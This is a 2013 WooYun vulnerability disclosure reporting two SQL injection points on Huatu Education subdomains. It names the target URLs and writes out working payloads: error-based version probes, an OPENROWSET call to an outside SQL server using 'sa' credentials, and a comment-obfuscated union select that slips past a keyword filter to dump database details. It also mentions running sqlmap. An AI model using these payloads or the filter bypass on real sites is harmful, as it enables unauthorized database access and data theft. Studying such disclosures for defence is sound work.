当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043097

漏洞标题:华图教育分站SQL注入两处

相关厂商:华图教育

漏洞作者: sql

提交时间:2013-11-18 19:27

修复时间:2013-11-23 19:27

公开时间:2013-11-23 19:27

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-18: 细节已通知厂商并且等待厂商处理中
2013-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

华图教育分站SQL注入一枚

详细说明:

注入点:
http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976
随手打个单引号如下图:
http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976'

111.jpg


SELECT n.Title,n.ClassNo,n.Price,n.hits,n.ActualPrice,n.SubjectType,n.ShortTitle,n.scaleimg,p.Course_type, p.Course_price, p.Course_number,s.SubjectName from NetClasses n,Cl_Course_Price p,NetClassSubjects s where n.rid=p.Course_id and n.SubjectType=s.rid and n.status=1 and n.videoType=5 and n.rid=24976‘
Filename: E:\svn_1dui1\system\database\DB_driver.php
数据库出错 还爆出了路径。
肯定存在注入。
最开始我以为php一般和mysql是一对好基友,谁知道这次可奇葩,竟然是mssql.
看下图
http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976 and 1=@@version

2222.jpg


Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
还是mssql2000
我用
http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976 and host_name()=@@servername
测试返回失败。
说明是站库分离的。
后来我又测试
http://1dui1.huatu.com/index.php/OnlineDetail/?
videoType=5&classtype=202&province=7&SubjectType=3&id=24976;select a.* FROM OPENROWSET
('SQLOLEDB','xx.xx.xx.xxx,443';'sa';'sa','select * FROM pubs.dbo.authors') as a;--
也没弹回来。难道数据库服务器不能上网?
算了,备份没戏了。放SQLMAP里跑吧

3336.jpg


数据库名是:HTOLMain
接下来就接着跑吧 都懂的 我就不浪费电了。

漏洞证明:

另外一处SQL注入点是这个:
http://sl.huatu.com/ArcList.php?act=1
http://sl.huatu.com/ArcList.php?act=1' and 'a'='a 正常
http://sl.huatu.com/ArcList.php?act=1' and 'a'='b 不正常
典型的字符注入点
本来我想直接 放SQLMAP里 我就看片去了。
谁知道片看完了 也没跑出来。
算了 亲自上阵吧。
测了测才发现 他可能有 防注入的东东,一出现select 之类 就会死掉了。
后来这样就可以了。
http://sl.huatu.com/ArcList.php?act=1' and 1=2 union all /*!select*/ 1,2,3,concat_ws(":",@@version,user(),@@datadir,database()),5,6,7,8,9,10,11,12,13,14%23

44444.jpg


5.1.62-log:htol_shenlun@211.151.49.15:/usr/local/mysql/var/:...
好了 版本 数据库名 用户名什么的都出来了。
知道怎么绕过以后 再上工具吧
吧select替换一下就可以了。

55555.jpg


在这里设置一下即可。
然后就扫出来了

66666.jpg


主要后台我没扫出来。懒的深入了
好了 收工,看片去了。

修复方案:

过滤

版权声明:转载请注明来源 sql@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-11-23 19:27

厂商回复:

漏洞Rank:6 (WooYun评价)

最新状态:

暂无